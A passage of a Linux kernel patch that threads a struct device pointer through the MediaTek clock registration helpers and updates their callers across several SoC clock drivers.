+ #define GATE_MTK(_id, _name, _parent, _regs, _shift, _ops)		\
+ 	GATE_MTK_FLAGS(_id, _name, _parent, _regs, _shift, _ops, 0)
+ 
+-int mtk_clk_register_gates(struct device_node *node,
++int mtk_clk_register_gates(struct device *dev, struct device_node *node,
+ 			   const struct mtk_gate *clks, int num,
+ 			   struct clk_hw_onecell_data *clk_data);
+ 
+-int mtk_clk_register_gates_with_dev(struct device_node *node,
+-				    const struct mtk_gate *clks, int num,
+-				    struct clk_hw_onecell_data *clk_data,
+-				    struct device *dev);
+-
+ void mtk_clk_unregister_gates(const struct mtk_gate *clks, int num,
+ 			      struct clk_hw_onecell_data *clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt2701-aud.c b/drivers/clk/mediatek/clk-mt2701-aud.c
+index 4287bd3f545ee..03ab212aa7f4e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-aud.c
++++ b/drivers/clk/mediatek/clk-mt2701-aud.c
+@@ -127,8 +127,8 @@ static int clk_mt2701_aud_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUD_NR);
+ 
+-	mtk_clk_register_gates(node, audio_clks, ARRAY_SIZE(audio_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, audio_clks,
++			       ARRAY_SIZE(audio_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt2701-eth.c b/drivers/clk/mediatek/clk-mt2701-eth.c
+index 601358748750e..924725d67c13e 100644
+--- a/drivers/clk/mediatek/clk-mt2701-eth.c
++++ b/drivers/clk/mediatek/clk-mt2701-eth.c
+@@ -51,8 +51,8 @@ static int clk_mt2701_eth_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_ETHSYS_NR);
+ 
+-	mtk_clk_register_gates(node, eth_clks, ARRAY_SIZE(eth_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, eth_clks,
++			       ARRAY_SIZE(eth_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt2701-g3d.c b/drivers/clk/mediatek/clk-mt2701-g3d.c
+index 8d1fc8e3336eb..501fb99bb41a2 100644
+--- a/drivers/clk/mediatek/clk-mt2701-g3d.c
++++ b/drivers/clk/mediatek/clk-mt2701-g3d.c
+@@ -45,7 +45,7 @@ static int clk_mt2701_g3dsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_G3DSYS_NR);
+ 
+-	mtk_clk_register_gates(node, g3d_clks, ARRAY_SIZE(g3d_clks),
++	mtk_clk_register_gates(&pdev->dev, node, g3d_clks, ARRAY_SIZE(g3d_clks),
+ 			       clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt2701-hif.c b/drivers/clk/mediatek/clk-mt2701-hif.c
+index edeeb033a2350..1ddefc21d6a0d 100644
+--- a/drivers/clk/mediatek/clk-mt2701-hif.c
++++ b/drivers/clk/mediatek/clk-mt2701-hif.c
+@@ -48,8 +48,8 @@ static int clk_mt2701_hif_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_HIFSYS_NR);
+ 
+-	mtk_clk_register_gates(node, hif_clks, ARRAY_SIZE(hif_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, hif_clks,
++			       ARRAY_SIZE(hif_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt2701-mm.c b/drivers/clk/mediatek/clk-mt2701-mm.c
+index eb069f3bc9a2b..f4885dffb324f 100644
+--- a/drivers/clk/mediatek/clk-mt2701-mm.c
++++ b/drivers/clk/mediatek/clk-mt2701-mm.c
+@@ -76,8 +76,8 @@ static int clk_mt2701_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt2701.c b/drivers/clk/mediatek/clk-mt2701.c
+index 00d2e81bdd43e..e80fe9c942eeb 100644
+--- a/drivers/clk/mediatek/clk-mt2701.c
++++ b/drivers/clk/mediatek/clk-mt2701.c
+@@ -679,14 +679,15 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_fixed_divs, ARRAY_SIZE(top_fixed_divs),
+ 								clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes),
+-				base, &mt2701_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt2701_clk_lock, clk_data);
+ 
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				base, &mt2701_clk_lock, clk_data);
+ 
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -789,8 +790,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-						infra_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), infra_clk_data);
+ 	mtk_clk_register_factors(infra_fixed_divs, ARRAY_SIZE(infra_fixed_divs),
+ 						infra_clk_data);
+ 
+@@ -902,11 +903,12 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-						clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+-	mtk_clk_register_composites(peri_muxs, ARRAY_SIZE(peri_muxs), base,
+-			&mt2701_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, peri_muxs,
++				    ARRAY_SIZE(peri_muxs), base,
++				    &mt2701_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt2712-mm.c b/drivers/clk/mediatek/clk-mt2712-mm.c
+index ad6daa8f28a83..e5264f1ce60d0 100644
+--- a/drivers/clk/mediatek/clk-mt2712-mm.c
++++ b/drivers/clk/mediatek/clk-mt2712-mm.c
+@@ -117,8 +117,8 @@ static int clk_mt2712_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt2712.c b/drivers/clk/mediatek/clk-mt2712.c
+index d6c2cc183b1a1..a0f0c9ed48d10 100644
+--- a/drivers/clk/mediatek/clk-mt2712.c
++++ b/drivers/clk/mediatek/clk-mt2712.c
+@@ -1320,12 +1320,13 @@ static int clk_mt2712_top_probe(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_early_divs, ARRAY_SIZE(top_early_divs),
+ 			top_clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), top_clk_data);
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
+-			&mt2712_clk_lock, top_clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt2712_clk_lock, top_clk_data);
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs), base,
+ 			&mt2712_clk_lock, top_clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-			top_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), top_clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, top_clk_data);
+ 
+@@ -1344,8 +1345,8 @@ static int clk_mt2712_infra_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -1366,8 +1367,8 @@ static int clk_mt2712_peri_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -1395,8 +1396,11 @@ static int clk_mt2712_mcu_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MCU_NR_CLK);
+ 
+-	mtk_clk_register_composites(mcu_muxes, ARRAY_SIZE(mcu_muxes), base,
+-			&mt2712_clk_lock, clk_data);
++	r = mtk_clk_register_composites(&pdev->dev, mcu_muxes,
++					ARRAY_SIZE(mcu_muxes), base,
++					&mt2712_clk_lock, clk_data);
++	if (r)
++		dev_err(&pdev->dev, "Could not register composites: %d\n", r);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6765.c b/drivers/clk/mediatek/clk-mt6765.c
+index 2c6a52ff5564e..c4941523f5520 100644
+--- a/drivers/clk/mediatek/clk-mt6765.c
++++ b/drivers/clk/mediatek/clk-mt6765.c
+@@ -743,7 +743,7 @@ static int clk_mt6765_apmixed_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -782,10 +782,11 @@ static int clk_mt6765_top_probe(struct platform_device *pdev)
+ 				    clk_data);
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs),
+ 				 clk_data);
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
+ 			       &mt6765_clk_lock, clk_data);
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+@@ -820,8 +821,8 @@ static int clk_mt6765_ifr_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, ifr_clks, ARRAY_SIZE(ifr_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, ifr_clks,
++			       ARRAY_SIZE(ifr_clks), clk_data);
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt6779-mm.c b/drivers/clk/mediatek/clk-mt6779-mm.c
+index eda8cbee3d234..2cccf62d3b36f 100644
+--- a/drivers/clk/mediatek/clk-mt6779-mm.c
++++ b/drivers/clk/mediatek/clk-mt6779-mm.c
+@@ -93,8 +93,8 @@ static int clk_mt6779_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt6779.c b/drivers/clk/mediatek/clk-mt6779.c
+index 39dadc9547088..7fe9d12b2dfdd 100644
+--- a/drivers/clk/mediatek/clk-mt6779.c
++++ b/drivers/clk/mediatek/clk-mt6779.c
+@@ -1223,7 +1223,7 @@ static int clk_mt6779_apmixed_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls), clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -1248,14 +1248,17 @@ static int clk_mt6779_top_probe(struct platform_device *pdev)
+ 
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs), clk_data);
+ 
+-	mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes),
+-			       node, &mt6779_clk_lock, clk_data);
++	mtk_clk_register_muxes(&pdev->dev, top_muxes,
++			       ARRAY_SIZE(top_muxes), node,
++			       &mt6779_clk_lock, clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_muxes, ARRAY_SIZE(top_aud_muxes),
+-				    base, &mt6779_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_muxes,
++				    ARRAY_SIZE(top_aud_muxes), base,
++				    &mt6779_clk_lock, clk_data);
+ 
+-	mtk_clk_register_composites(top_aud_divs, ARRAY_SIZE(top_aud_divs),
+-				    base, &mt6779_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_aud_divs,
++				    ARRAY_SIZE(top_aud_divs), base,
++				    &mt6779_clk_lock, clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -1267,8 +1270,8 @@ static int clk_mt6779_infra_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+diff --git a/drivers/clk/mediatek/clk-mt6795-infracfg.c b/drivers/clk/mediatek/clk-mt6795-infracfg.c
+index df7eed6e071e3..8025d171d6923 100644
+--- a/drivers/clk/mediatek/clk-mt6795-infracfg.c
++++ b/drivers/clk/mediatek/clk-mt6795-infracfg.c
+@@ -101,7 +101,8 @@ static int clk_mt6795_infracfg_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+-	ret = mtk_clk_register_gates(node, infra_gates, ARRAY_SIZE(infra_gates), clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, infra_gates,
++				     ARRAY_SIZE(infra_gates), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6795-mm.c b/drivers/clk/mediatek/clk-mt6795-mm.c
+index fd73f202f2925..eebb6143ada22 100644
+--- a/drivers/clk/mediatek/clk-mt6795-mm.c
++++ b/drivers/clk/mediatek/clk-mt6795-mm.c
+@@ -87,7 +87,8 @@ static int clk_mt6795_mm_probe(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	ret = mtk_clk_register_gates(node, mm_gates, ARRAY_SIZE(mm_gates), clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, mm_gates,
++				     ARRAY_SIZE(mm_gates), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+diff --git a/drivers/clk/mediatek/clk-mt6795-pericfg.c b/drivers/clk/mediatek/clk-mt6795-pericfg.c
+index cb28d35dad59b..08aaa9b09c363 100644
+--- a/drivers/clk/mediatek/clk-mt6795-pericfg.c
++++ b/drivers/clk/mediatek/clk-mt6795-pericfg.c
+@@ -109,11 +109,13 @@ static int clk_mt6795_pericfg_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+-	ret = mtk_clk_register_gates(node, peri_gates, ARRAY_SIZE(peri_gates), clk_data);
++	ret = mtk_clk_register_gates(&pdev->dev, node, peri_gates,
++				     ARRAY_SIZE(peri_gates), clk_data);
+ 	if (ret)
+ 		goto free_clk_data;
+ 
+-	ret = mtk_clk_register_composites(peri_clks, ARRAY_SIZE(peri_clks), base,
++	ret = mtk_clk_register_composites(&pdev->dev, peri_clks,
++					  ARRAY_SIZE(peri_clks), base,
+ 					  &mt6795_peri_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_gates;
+diff --git a/drivers/clk/mediatek/clk-mt6795-topckgen.c b/drivers/clk/mediatek/clk-mt6795-topckgen.c
+index 2948dd1aee8fa..2ab8bf5d6d6d9 100644
+--- a/drivers/clk/mediatek/clk-mt6795-topckgen.c
++++ b/drivers/clk/mediatek/clk-mt6795-topckgen.c
+@@ -552,12 +552,14 @@ static int clk_mt6795_topckgen_probe(struct platform_device *pdev)
+ 	if (ret)
+ 		goto unregister_fixed_clks;
+ 
+-	ret = mtk_clk_register_muxes(top_muxes, ARRAY_SIZE(top_muxes), node,
++	ret = mtk_clk_register_muxes(&pdev->dev, top_muxes,
++				     ARRAY_SIZE(top_muxes), node,
+ 				     &mt6795_top_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_factors;
+ 
+-	ret = mtk_clk_register_composites(top_aud_divs, ARRAY_SIZE(top_aud_divs), base,
++	ret = mtk_clk_register_composites(&pdev->dev, top_aud_divs,
++					  ARRAY_SIZE(top_aud_divs), base,
+ 					  &mt6795_top_clk_lock, clk_data);
+ 	if (ret)
+ 		goto unregister_muxes;
+diff --git a/drivers/clk/mediatek/clk-mt6797-mm.c b/drivers/clk/mediatek/clk-mt6797-mm.c
+index 99a63f46642fa..d5e9fe445e308 100644
+--- a/drivers/clk/mediatek/clk-mt6797-mm.c
++++ b/drivers/clk/mediatek/clk-mt6797-mm.c
+@@ -89,8 +89,8 @@ static int clk_mt6797_mm_probe(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_MM_NR);
+ 
+-	mtk_clk_register_gates(node, mm_clks, ARRAY_SIZE(mm_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, mm_clks,
++			       ARRAY_SIZE(mm_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt6797.c b/drivers/clk/mediatek/clk-mt6797.c
+index b362e99c8f53c..0429a80f3cad7 100644
+--- a/drivers/clk/mediatek/clk-mt6797.c
++++ b/drivers/clk/mediatek/clk-mt6797.c
+@@ -398,7 +398,8 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_fixed_divs, ARRAY_SIZE(top_fixed_divs),
+ 				 clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes), base,
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
+ 				    &mt6797_clk_lock, clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -584,8 +585,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       infra_clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), infra_clk_data);
+ 	mtk_clk_register_factors(infra_fixed_divs, ARRAY_SIZE(infra_fixed_divs),
+ 				 infra_clk_data);
+ 
+diff --git a/drivers/clk/mediatek/clk-mt7622-aud.c b/drivers/clk/mediatek/clk-mt7622-aud.c
+index b17731fa11445..e9070d0bea8d6 100644
+--- a/drivers/clk/mediatek/clk-mt7622-aud.c
++++ b/drivers/clk/mediatek/clk-mt7622-aud.c
+@@ -114,8 +114,8 @@ static int clk_mt7622_audiosys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_AUDIO_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, audio_clks, ARRAY_SIZE(audio_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, audio_clks,
++			       ARRAY_SIZE(audio_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r) {
+diff --git a/drivers/clk/mediatek/clk-mt7622-eth.c b/drivers/clk/mediatek/clk-mt7622-eth.c
+index a60190e834186..ece0f7a7c5f62 100644
+--- a/drivers/clk/mediatek/clk-mt7622-eth.c
++++ b/drivers/clk/mediatek/clk-mt7622-eth.c
+@@ -69,8 +69,8 @@ static int clk_mt7622_ethsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_ETH_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, eth_clks, ARRAY_SIZE(eth_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, eth_clks,
++			       ARRAY_SIZE(eth_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -91,8 +91,8 @@ static int clk_mt7622_sgmiisys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SGMII_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, sgmii_clks, ARRAY_SIZE(sgmii_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, sgmii_clks,
++			       ARRAY_SIZE(sgmii_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7622-hif.c b/drivers/clk/mediatek/clk-mt7622-hif.c
+index 55baa6d06a205..c57ac2273c4e2 100644
+--- a/drivers/clk/mediatek/clk-mt7622-hif.c
++++ b/drivers/clk/mediatek/clk-mt7622-hif.c
+@@ -80,8 +80,8 @@ static int clk_mt7622_ssusbsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SSUSB_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, ssusb_clks, ARRAY_SIZE(ssusb_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, ssusb_clks,
++			       ARRAY_SIZE(ssusb_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -102,8 +102,8 @@ static int clk_mt7622_pciesys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PCIE_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, pcie_clks, ARRAY_SIZE(pcie_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, pcie_clks,
++			       ARRAY_SIZE(pcie_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7622.c b/drivers/clk/mediatek/clk-mt7622.c
+index eebbb87906930..67a296646722f 100644
+--- a/drivers/clk/mediatek/clk-mt7622.c
++++ b/drivers/clk/mediatek/clk-mt7622.c
+@@ -615,14 +615,15 @@ static int mtk_topckgen_init(struct platform_device *pdev)
+ 	mtk_clk_register_factors(top_divs, ARRAY_SIZE(top_divs),
+ 				 clk_data);
+ 
+-	mtk_clk_register_composites(top_muxes, ARRAY_SIZE(top_muxes),
+-				    base, &mt7622_clk_lock, clk_data);
++	mtk_clk_register_composites(&pdev->dev, top_muxes,
++				    ARRAY_SIZE(top_muxes), base,
++				    &mt7622_clk_lock, clk_data);
+ 
+ 	mtk_clk_register_dividers(top_adj_divs, ARRAY_SIZE(top_adj_divs),
+ 				  base, &mt7622_clk_lock, clk_data);
+ 
+-	mtk_clk_register_gates(node, top_clks, ARRAY_SIZE(top_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, top_clks,
++			       ARRAY_SIZE(top_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ }
+@@ -635,8 +636,8 @@ static int mtk_infrasys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_INFRA_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, infra_clks, ARRAY_SIZE(infra_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, infra_clks,
++			       ARRAY_SIZE(infra_clks), clk_data);
+ 
+ 	mtk_clk_register_cpumuxes(node, infra_muxes, ARRAY_SIZE(infra_muxes),
+ 				  clk_data);
+@@ -663,7 +664,7 @@ static int mtk_apmixedsys_init(struct platform_device *pdev)
+ 	mtk_clk_register_plls(node, plls, ARRAY_SIZE(plls),
+ 			      clk_data);
+ 
+-	mtk_clk_register_gates(node, apmixed_clks,
++	mtk_clk_register_gates(&pdev->dev, node, apmixed_clks,
+ 			       ARRAY_SIZE(apmixed_clks), clk_data);
+ 
+ 	return of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+@@ -682,10 +683,11 @@ static int mtk_pericfg_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_PERI_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, peri_clks, ARRAY_SIZE(peri_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, peri_clks,
++			       ARRAY_SIZE(peri_clks), clk_data);
+ 
+-	mtk_clk_register_composites(peri_muxes, ARRAY_SIZE(peri_muxes), base,
++	mtk_clk_register_composites(&pdev->dev, peri_muxes,
++				    ARRAY_SIZE(peri_muxes), base,
+ 				    &mt7622_clk_lock, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+diff --git a/drivers/clk/mediatek/clk-mt7629-eth.c b/drivers/clk/mediatek/clk-mt7629-eth.c
+index e1d2635c72c10..eab838af6d413 100644
+--- a/drivers/clk/mediatek/clk-mt7629-eth.c
++++ b/drivers/clk/mediatek/clk-mt7629-eth.c
+@@ -82,7 +82,8 @@ static int clk_mt7629_ethsys_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, eth_clks, CLK_ETH_NR_CLK, clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, eth_clks,
++			       CLK_ETH_NR_CLK, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -106,8 +107,8 @@ static int clk_mt7629_sgmiisys_init(struct platform_device *pdev)
+ 	if (!clk_data)
+ 		return -ENOMEM;
+ 
+-	mtk_clk_register_gates(node, sgmii_clks[id++], CLK_SGMII_NR_CLK,
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, sgmii_clks[id++],
++			       CLK_SGMII_NR_CLK, clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+diff --git a/drivers/clk/mediatek/clk-mt7629-hif.c b/drivers/clk/mediatek/clk-mt7629-hif.c
+index 3628811a2f57f..804900792e490 100644
+--- a/drivers/clk/mediatek/clk-mt7629-hif.c
++++ b/drivers/clk/mediatek/clk-mt7629-hif.c
+@@ -75,8 +75,8 @@ static int clk_mt7629_ssusbsys_init(struct platform_device *pdev)
+ 
+ 	clk_data = mtk_alloc_clk_data(CLK_SSUSB_NR_CLK);
+ 
+-	mtk_clk_register_gates(node, ssusb_clks, ARRAY_SIZE(ssusb_clks),
+-			       clk_data);
++	mtk_clk_register_gates(&pdev->dev, node, ssusb_clks,
++			       ARRAY_SIZE(ssusb_clks), clk_data);
+ 
+ 	r = of_clk_add_hw_provider(node, of_clk_hw_onecell_get, clk_data);
+ 	if (r)
+@@ -97,8 +97,8 @@ static int clk_mt7629_pciesys_init(struct platform_device *pdev)
+ 
